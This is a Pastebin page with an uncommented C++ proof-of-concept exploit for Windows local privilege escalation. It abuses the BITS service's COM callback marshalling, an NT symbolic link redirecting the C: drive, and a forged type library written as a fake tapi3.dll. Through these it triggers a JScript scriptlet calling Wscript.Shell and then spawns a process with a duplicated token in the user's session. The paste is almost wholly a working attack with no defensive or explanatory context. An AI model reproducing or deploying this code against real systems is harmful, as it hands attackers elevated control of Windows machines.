API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 24th, 2020
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.21 KB | None | 0 0
raw download clone embed print report
  1. #include <bits.h>
  2. #include <bits4_0.h>
  3. #include <stdio.h>
  4. #include <tchar.h>
  5. #include <lm.h>
  6. #include <string>
  7. #include <comdef.h>
  8. #include <winternl.h>
  9. #include <Shlwapi.h>
  10. #include <strsafe.h>
  11. #include <vector>
  12.  
  13. #pragma comment(lib, "shlwapi.lib")
  14.  
  15. static bstr_t IIDToBSTR(REFIID riid)
  16. {
  17. LPOLESTR str;
  18. bstr_t ret = "Unknown";
  19. if (SUCCEEDED(StringFromIID(riid, &str)))
  20. {
  21. ret = str;
  22. CoTaskMemFree(str);
  23. }
  24. return ret;
  25. }
  26.  
  27. GUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };
  28. GUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };
  29.  
  30. class CMarshaller : public IMarshal
  31. {
  32. LONG _ref_count;
  33. IUnknownPtr _unk;
  34.  
  35. ~CMarshaller() {}
  36.  
  37. public:
  38.  
  39. CMarshaller(IUnknown* unk) : _ref_count(1)
  40. {
  41. _unk = unk;
  42. }
  43.  
  44. virtual HRESULT STDMETHODCALLTYPE QueryInterface(
  45. /* [in] */ REFIID riid,
  46. /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)
  47. {
  48. *ppvObject = nullptr;
  49. printf("QI - Marshaller: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
  50.  
  51. if (riid == IID_IUnknown)
  52. {
  53. *ppvObject = this;
  54. }
  55. else if (riid == IID_IMarshal)
  56. {
  57. *ppvObject = static_cast<IMarshal*>(this);
  58. }
  59. else
  60. {
  61. return E_NOINTERFACE;
  62. }
  63. printf("Queried Success: %p\n", *ppvObject);
  64. ((IUnknown*)*ppvObject)->AddRef();
  65. return S_OK;
  66. }
  67.  
  68. virtual ULONG STDMETHODCALLTYPE AddRef(void)
  69. {
  70. printf("AddRef: %d\n", _ref_count);
  71. return InterlockedIncrement(&_ref_count);
  72. }
  73.  
  74. virtual ULONG STDMETHODCALLTYPE Release(void)
  75. {
  76. printf("Release: %d\n", _ref_count);
  77. ULONG ret = InterlockedDecrement(&_ref_count);
  78. if (ret == 0)
  79. {
  80. printf("Release object %p\n", this);
  81. delete this;
  82. }
  83. return ret;
  84. }
  85.  
  86. virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(
  87. /* [annotation][in] */
  88. _In_ REFIID riid,
  89. /* [annotation][unique][in] */
  90. _In_opt_ void *pv,
  91. /* [annotation][in] */
  92. _In_ DWORD dwDestContext,
  93. /* [annotation][unique][in] */
  94. _Reserved_ void *pvDestContext,
  95. /* [annotation][in] */
  96. _In_ DWORD mshlflags,
  97. /* [annotation][out] */
  98. _Out_ CLSID *pCid)
  99. {
  100. *pCid = CLSID_AggStdMarshal2;
  101. return S_OK;
  102. }
  103.  
  104. virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(
  105. /* [annotation][in] */
  106. _In_ REFIID riid,
  107. /* [annotation][unique][in] */
  108. _In_opt_ void *pv,
  109. /* [annotation][in] */
  110. _In_ DWORD dwDestContext,
  111. /* [annotation][unique][in] */
  112. _Reserved_ void *pvDestContext,
  113. /* [annotation][in] */
  114. _In_ DWORD mshlflags,
  115. /* [annotation][out] */
  116. _Out_ DWORD *pSize)
  117. {
  118. *pSize = 1024;
  119. return S_OK;
  120. }
  121.  
  122. virtual HRESULT STDMETHODCALLTYPE MarshalInterface(
  123. /* [annotation][unique][in] */
  124. _In_ IStream *pStm,
  125. /* [annotation][in] */
  126. _In_ REFIID riid,
  127. /* [annotation][unique][in] */
  128. _In_opt_ void *pv,
  129. /* [annotation][in] */
  130. _In_ DWORD dwDestContext,
  131. /* [annotation][unique][in] */
  132. _Reserved_ void *pvDestContext,
  133. /* [annotation][in] */
  134. _In_ DWORD mshlflags)
  135. {
  136. printf("Marshal Interface: %ls\n", IIDToBSTR(riid).GetBSTR());
  137. IID iid = riid;
  138. if (iid == __uuidof(IBackgroundCopyCallback2) || iid == __uuidof(IBackgroundCopyCallback))
  139. {
  140. printf("Setting bad IID\n");
  141. iid = IID_ITMediaControl;
  142. }
  143. HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);
  144. printf("Marshal Complete: %08X\n", hr);
  145. return hr;
  146. }
  147.  
  148. virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(
  149. /* [annotation][unique][in] */
  150. _In_ IStream *pStm,
  151. /* [annotation][in] */
  152. _In_ REFIID riid,
  153. /* [annotation][out] */
  154. _Outptr_ void **ppv)
  155. {
  156. return E_NOTIMPL;
  157. }
  158.  
  159. virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(
  160. /* [annotation][unique][in] */
  161. _In_ IStream *pStm)
  162. {
  163. return S_OK;
  164. }
  165.  
  166. virtual HRESULT STDMETHODCALLTYPE DisconnectObject(
  167. /* [annotation][in] */
  168. _In_ DWORD dwReserved)
  169. {
  170. return S_OK;
  171. }
  172. };
  173.  
  174. class FakeObject : public IBackgroundCopyCallback2, public IPersist
  175. {
  176. LONG m_lRefCount;
  177.  
  178. ~FakeObject() {};
  179.  
  180. public:
  181. //Constructor, Destructor
  182. FakeObject() {
  183. m_lRefCount = 1;
  184. }
  185.  
  186. //IUnknown
  187. HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)
  188. {
  189. if (riid == __uuidof(IUnknown))
  190. {
  191. printf("Query for IUnknown\n");
  192. *ppvObj = this;
  193. }
  194. else if (riid == __uuidof(IBackgroundCopyCallback2))
  195. {
  196. printf("Query for IBackgroundCopyCallback2\n");
  197. *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);
  198. }
  199. else if (riid == __uuidof(IBackgroundCopyCallback))
  200. {
  201. printf("Query for IBackgroundCopyCallback\n");
  202. *ppvObj = static_cast<IBackgroundCopyCallback*>(this);
  203. }
  204. else if (riid == __uuidof(IPersist))
  205. {
  206. printf("Query for IPersist\n");
  207. *ppvObj = static_cast<IPersist*>(this);
  208. }
  209. else if (riid == IID_ITMediaControl)
  210. {
  211. printf("Query for ITMediaControl\n");
  212. *ppvObj = static_cast<IPersist*>(this);
  213. }
  214. else
  215. {
  216. printf("Unknown IID: %ls %p\n", IIDToBSTR(riid).GetBSTR(), this);
  217. *ppvObj = NULL;
  218. return E_NOINTERFACE;
  219. }
  220.  
  221. ((IUnknown*)*ppvObj)->AddRef();
  222. return NOERROR;
  223. }
  224.  
  225. ULONG __stdcall AddRef()
  226. {
  227. return InterlockedIncrement(&m_lRefCount);
  228. }
  229.  
  230. ULONG __stdcall Release()
  231. {
  232. ULONG ulCount = InterlockedDecrement(&m_lRefCount);
  233.  
  234. if (0 == ulCount)
  235. {
  236. delete this;
  237. }
  238.  
  239. return ulCount;
  240. }
  241.  
  242. virtual HRESULT STDMETHODCALLTYPE JobTransferred(
  243. /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)
  244. {
  245. printf("JobTransferred\n");
  246. return S_OK;
  247. }
  248.  
  249. virtual HRESULT STDMETHODCALLTYPE JobError(
  250. /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  251. /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)
  252. {
  253. printf("JobError\n");
  254. return S_OK;
  255. }
  256.  
  257.  
  258. virtual HRESULT STDMETHODCALLTYPE JobModification(
  259. /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  260. /* [in] */ DWORD dwReserved)
  261. {
  262. printf("JobModification\n");
  263. return S_OK;
  264. }
  265.  
  266.  
  267. virtual HRESULT STDMETHODCALLTYPE FileTransferred(
  268. /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,
  269. /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)
  270. {
  271. printf("FileTransferred\n");
  272. return S_OK;
  273. }
  274.  
  275. virtual HRESULT STDMETHODCALLTYPE GetClassID(
  276. /* [out] */ __RPC__out CLSID *pClassID)
  277. {
  278. *pClassID = GUID_NULL;
  279. return S_OK;
  280. }
  281. };
  282.  
  283. _COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, __uuidof(IBackgroundCopyJob));
  284. _COM_SMARTPTR_TYPEDEF(IBackgroundCopyManager, __uuidof(IBackgroundCopyManager));
  285.  
  286. static HRESULT Check(HRESULT hr)
  287. {
  288. if (FAILED(hr))
  289. {
  290. throw _com_error(hr);
  291. }
  292. return hr;
  293. }
  294.  
  295. #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
  296.  
  297. typedef NTSTATUS(NTAPI* fNtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName);
  298. typedef VOID(NTAPI *fRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
  299.  
  300. FARPROC GetProcAddressNT(LPCSTR lpName)
  301. {
  302. return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
  303. }
  304.  
  305.  
  306. class ScopedHandle
  307. {
  308. HANDLE _h;
  309. public:
  310. ScopedHandle() : _h(nullptr)
  311. {
  312. }
  313.  
  314. ScopedHandle(ScopedHandle&) = delete;
  315.  
  316. ScopedHandle(ScopedHandle&& h) {
  317. _h = h._h;
  318. h._h = nullptr;
  319. }
  320.  
  321. ~ScopedHandle()
  322. {
  323. if (!invalid())
  324. {
  325. CloseHandle(_h);
  326. _h = nullptr;
  327. }
  328. }
  329.  
  330. bool invalid() {
  331. return (_h == nullptr) || (_h == INVALID_HANDLE_VALUE);
  332. }
  333.  
  334. void set(HANDLE h)
  335. {
  336. _h = h;
  337. }
  338.  
  339. HANDLE get()
  340. {
  341. return _h;
  342. }
  343.  
  344. HANDLE* ptr()
  345. {
  346. return &_h;
  347. }
  348.  
  349.  
  350. };
  351.  
  352. ScopedHandle CreateSymlink(LPCWSTR linkname, LPCWSTR targetname)
  353. {
  354. fRtlInitUnicodeString pfRtlInitUnicodeString = (fRtlInitUnicodeString)GetProcAddressNT("RtlInitUnicodeString");
  355. fNtCreateSymbolicLinkObject pfNtCreateSymbolicLinkObject = (fNtCreateSymbolicLinkObject)GetProcAddressNT("NtCreateSymbolicLinkObject");
  356.  
  357. OBJECT_ATTRIBUTES objAttr;
  358. UNICODE_STRING name;
  359. UNICODE_STRING target;
  360.  
  361. pfRtlInitUnicodeString(&name, linkname);
  362. pfRtlInitUnicodeString(&target, targetname);
  363.  
  364. InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
  365.  
  366. ScopedHandle hLink;
  367.  
  368. NTSTATUS status = pfNtCreateSymbolicLinkObject(hLink.ptr(), SYMBOLIC_LINK_ALL_ACCESS, &objAttr, &target);
  369. if (status == 0)
  370. {
  371. printf("Opened Link %ls -> %ls: %p\n", linkname, targetname, hLink.get());
  372. return hLink;
  373. }
  374. else
  375. {
  376. printf("Error creating link %ls: %08X\n", linkname, status);
  377. return ScopedHandle();
  378. }
  379. }
  380.  
  381.  
  382. bstr_t GetSystemDrive()
  383. {
  384. WCHAR windows_dir[MAX_PATH] = { 0 };
  385.  
  386. GetWindowsDirectory(windows_dir, MAX_PATH);
  387.  
  388. windows_dir[2] = 0;
  389.  
  390. return windows_dir;
  391. }
  392.  
  393. bstr_t GetDeviceFromPath(LPCWSTR lpPath)
  394. {
  395. WCHAR drive[3] = { 0 };
  396. drive[0] = lpPath[0];
  397. drive[1] = lpPath[1];
  398. drive[2] = 0;
  399.  
  400. WCHAR device_name[MAX_PATH] = { 0 };
  401.  
  402. if (QueryDosDevice(drive, device_name, MAX_PATH))
  403. {
  404. return device_name;
  405. }
  406. else
  407. {
  408. printf("Error getting device for %ls\n", lpPath);
  409. exit(1);
  410. }
  411. }
  412.  
  413. bstr_t GetSystemDevice()
  414. {
  415. return GetDeviceFromPath(GetSystemDrive());
  416. }
  417.  
  418. bstr_t GetExe()
  419. {
  420. WCHAR curr_path[MAX_PATH] = { 0 };
  421. GetModuleFileName(nullptr, curr_path, MAX_PATH);
  422. return curr_path;
  423. }
  424.  
  425. bstr_t GetExeDir()
  426. {
  427. WCHAR curr_path[MAX_PATH] = { 0 };
  428. GetModuleFileName(nullptr, curr_path, MAX_PATH);
  429. PathRemoveFileSpec(curr_path);
  430.  
  431. return curr_path;
  432. }
  433.  
  434. bstr_t GetCurrentPath()
  435. {
  436. bstr_t curr_path = GetExeDir();
  437.  
  438. bstr_t ret = GetDeviceFromPath(curr_path);
  439.  
  440. ret += &curr_path.GetBSTR()[2];
  441.  
  442. return ret;
  443. }
  444.  
  445. void TestBits()
  446. {
  447. IBackgroundCopyManagerPtr pQueueMgr;
  448.  
  449. Check(CoCreateInstance(__uuidof(BackgroundCopyManager), NULL,
  450. CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pQueueMgr)));
  451.  
  452. IUnknownPtr pOuter = new CMarshaller(static_cast<IPersist*>(new FakeObject()));
  453. IUnknownPtr pInner;
  454.  
  455. Check(CoGetStdMarshalEx(pOuter, SMEXF_SERVER, &pInner));
  456.  
  457. IBackgroundCopyJobPtr pJob;
  458. GUID guidJob;
  459. Check(pQueueMgr->CreateJob(L"BitsAuthSample",
  460. BG_JOB_TYPE_DOWNLOAD,
  461. &guidJob,
  462. &pJob));
  463.  
  464. IUnknownPtr pNotify;
  465. pNotify.Attach(new CMarshaller(pInner));
  466. {
  467. ScopedHandle link = CreateSymlink(L"\\??\\C:", GetCurrentPath());
  468. printf("Result: %08X\n", pJob->SetNotifyInterface(pNotify));
  469. }
  470. if (pJob)
  471. {
  472. pJob->Cancel();
  473. }
  474. printf("Done\n");
  475. }
  476.  
  477. class CoInit
  478. {
  479. public:
  480. CoInit()
  481. {
  482. Check(CoInitialize(nullptr));
  483. Check(CoInitializeSecurity(nullptr, -1, nullptr, nullptr,
  484. RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_NO_CUSTOM_MARSHAL | EOAC_DYNAMIC_CLOAKING, nullptr));
  485. }
  486.  
  487. ~CoInit()
  488. {
  489. CoUninitialize();
  490. }
  491. };
  492.  
  493. // {D487789C-32A3-4E22-B46A-C4C4C1C2D3E0}
  494. static const GUID IID_BaseInterface =
  495. { 0xd487789c, 0x32a3, 0x4e22,{ 0xb4, 0x6a, 0xc4, 0xc4, 0xc1, 0xc2, 0xd3, 0xe0 } };
  496.  
  497. // {6C6C9F33-AE88-4EC2-BE2D-449A0FFF8C02}
  498. static const GUID TypeLib_BaseInterface =
  499. { 0x6c6c9f33, 0xae88, 0x4ec2,{ 0xbe, 0x2d, 0x44, 0x9a, 0xf, 0xff, 0x8c, 0x2 } };
  500.  
  501. GUID TypeLib_Tapi3 = { 0x21d6d480,0xa88b,0x11d0,{ 0x83,0xdd,0x00,0xaa,0x00,0x3c,0xca,0xbd } };
  502.  
  503. void Create(bstr_t filename, bstr_t if_name, REFGUID typelib_guid, REFGUID iid, ITypeLib* ref_typelib, REFGUID ref_iid)
  504. {
  505. DeleteFile(filename);
  506. ICreateTypeLib2Ptr tlb;
  507. Check(CreateTypeLib2(SYS_WIN32, filename, &tlb));
  508. tlb->SetGuid(typelib_guid);
  509.  
  510. ITypeInfoPtr ref_type_info;
  511. Check(ref_typelib->GetTypeInfoOfGuid(ref_iid, &ref_type_info));
  512.  
  513. ICreateTypeInfoPtr create_info;
  514. Check(tlb->CreateTypeInfo(if_name, TKIND_INTERFACE, &create_info));
  515. Check(create_info->SetTypeFlags(TYPEFLAG_FDUAL | TYPEFLAG_FOLEAUTOMATION));
  516. HREFTYPE ref_type;
  517. Check(create_info->AddRefTypeInfo(ref_type_info, &ref_type));
  518. Check(create_info->AddImplType(0, ref_type));
  519. Check(create_info->SetGuid(iid));
  520. Check(tlb->SaveAllChanges());
  521. }
  522.  
  523. std::vector<BYTE> ReadFile(bstr_t path)
  524. {
  525. ScopedHandle hFile;
  526. hFile.set(CreateFile(path, GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr));
  527. if (hFile.invalid())
  528. {
  529. throw _com_error(E_FAIL);
  530. }
  531. DWORD size = GetFileSize(hFile.get(), nullptr);
  532. std::vector<BYTE> ret(size);
  533. if (size > 0)
  534. {
  535. DWORD bytes_read;
  536. if (!ReadFile(hFile.get(), ret.data(), size, &bytes_read, nullptr) || bytes_read != size)
  537. {
  538. throw _com_error(E_FAIL);
  539. }
  540. }
  541.  
  542. return ret;
  543. }
  544.  
  545. void WriteFile(bstr_t path, const std::vector<BYTE> data)
  546. {
  547. ScopedHandle hFile;
  548. hFile.set(CreateFile(path, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, nullptr));
  549. if (hFile.invalid())
  550. {
  551. throw _com_error(E_FAIL);
  552. }
  553.  
  554. if (data.size() > 0)
  555. {
  556. DWORD bytes_written;
  557. if (!WriteFile(hFile.get(), data.data(), data.size(), &bytes_written, nullptr) || bytes_written != data.size())
  558. {
  559. throw _com_error(E_FAIL);
  560. }
  561. }
  562. }
  563.  
  564. void WriteFile(bstr_t path, const char* data)
  565. {
  566. const BYTE* bytes = reinterpret_cast<const BYTE*>(data);
  567. std::vector<BYTE> data_buf(bytes, bytes + strlen(data));
  568. WriteFile(path, data_buf);
  569. }
  570.  
  571. void BuildTypeLibs(LPCSTR script_path)
  572. {
  573. ITypeLibPtr stdole2;
  574. Check(LoadTypeLib(L"stdole2.tlb", &stdole2));
  575.  
  576. printf("Building Library with path: %s\n", script_path);
  577. unsigned int len = strlen(script_path);
  578.  
  579. bstr_t buf = GetExeDir() + L"\\";
  580. for (unsigned int i = 0; i < len; ++i)
  581. {
  582. buf += L"A";
  583. }
  584.  
  585. Create(buf, "IBadger", TypeLib_BaseInterface, IID_BaseInterface, stdole2, IID_IDispatch);
  586. ITypeLibPtr abc;
  587. Check(LoadTypeLib(buf, &abc));
  588.  
  589.  
  590. bstr_t built_tlb = GetExeDir() + L"\\output.tlb";
  591. Create(built_tlb, "ITMediaControl", TypeLib_Tapi3, IID_ITMediaControl, abc, IID_BaseInterface);
  592.  
  593. std::vector<BYTE> tlb_data = ReadFile(built_tlb);
  594. for (size_t i = 0; i < tlb_data.size() - len; ++i)
  595. {
  596. bool found = true;
  597. for (unsigned int j = 0; j < len; j++)
  598. {
  599. if (tlb_data[i + j] != 'A')
  600. {
  601. found = false;
  602. }
  603. }
  604.  
  605. if (found)
  606. {
  607. printf("Found TLB name at offset %zu\n", i);
  608. memcpy(&tlb_data[i], script_path, len);
  609. break;
  610. }
  611. }
  612.  
  613. CreateDirectory(GetExeDir() + L"\\Windows", nullptr);
  614. CreateDirectory(GetExeDir() + L"\\Windows\\System32", nullptr);
  615.  
  616. bstr_t target_tlb = GetExeDir() + L"\\Windows\\system32\\tapi3.dll";
  617. WriteFile(target_tlb, tlb_data);
  618. }
  619.  
  620. const wchar_t x[] = L"ABC";
  621.  
  622. const wchar_t scriptlet_start[] = L"<?xml version='1.0'?>\r\n<package>\r\n<component id='giffile'>\r\n"
  623. "<registration description='Dummy' progid='giffile' version='1.00' remotable='True'>\r\n"\
  624. "</registration>\r\n"\
  625. "<script language='JScript'>\r\n"\
  626. "<![CDATA[\r\n"\
  627. " new ActiveXObject('Wscript.Shell').exec('";
  628.  
  629. const wchar_t scriptlet_end[] = L"');\r\n"\
  630. "]]>\r\n"\
  631. "</script>\r\n"\
  632. "</component>\r\n"\
  633. "</package>\r\n";
  634.  
  635. bstr_t CreateScriptletFile()
  636. {
  637. bstr_t script_file = GetExeDir() + L"\\run.sct";
  638. bstr_t script_data = scriptlet_start;
  639. bstr_t exe_file = GetExe();
  640. wchar_t* p = exe_file;
  641. while (*p)
  642. {
  643. if (*p == '\\')
  644. {
  645. *p = '/';
  646. }
  647. p++;
  648. }
  649.  
  650. DWORD session_id;
  651. ProcessIdToSessionId(GetCurrentProcessId(), &session_id);
  652. WCHAR session_str[16];
  653. StringCchPrintf(session_str, _countof(session_str), L"%d", session_id);
  654.  
  655. script_data += L"\"" + exe_file + L"\" " + session_str + scriptlet_end;
  656.  
  657. WriteFile(script_file, script_data);
  658.  
  659. return script_file;
  660. }
  661.  
  662. void CreateNewProcess(const wchar_t* session)
  663. {
  664. DWORD session_id = wcstoul(session, nullptr, 0);
  665. ScopedHandle token;
  666. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token.ptr()))
  667. {
  668. throw _com_error(E_FAIL);
  669. }
  670.  
  671. ScopedHandle new_token;
  672.  
  673. if (!DuplicateTokenEx(token.get(), TOKEN_ALL_ACCESS, nullptr, SecurityAnonymous, TokenPrimary, new_token.ptr()))
  674. {
  675. throw _com_error(E_FAIL);
  676. }
  677.  
  678. SetTokenInformation(new_token.get(), TokenSessionId, &session_id, sizeof(session_id));
  679.  
  680. STARTUPINFO start_info = {};
  681. start_info.cb = sizeof(start_info);
  682. start_info.lpDesktop = L"WinSta0\\Default";
  683. PROCESS_INFORMATION proc_info;
  684. WCHAR cmdline[] = L"sys32.exe";
  685. if (CreateProcessAsUser(new_token.get(), nullptr, cmdline,
  686. nullptr, nullptr, FALSE, CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))
  687. {
  688. CloseHandle(proc_info.hProcess);
  689. CloseHandle(proc_info.hThread);
  690. }
  691. }
  692.  
  693. int wmain(int argc, wchar_t** argv)
  694. {
  695. try
  696. {
  697. CoInit ci;
  698. if (argc > 1)
  699. {
  700. CreateNewProcess(argv[1]);
  701. }
  702. else
  703. {
  704. bstr_t script = L"script:" + CreateScriptletFile();
  705. BuildTypeLibs(script);
  706. TestBits();
  707. }
  708. }
  709. catch (const _com_error& err)
  710. {
  711. printf("Error: %ls\n", err.ErrorMessage());
  712. }
  713.  
  714. return 0;
  715. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!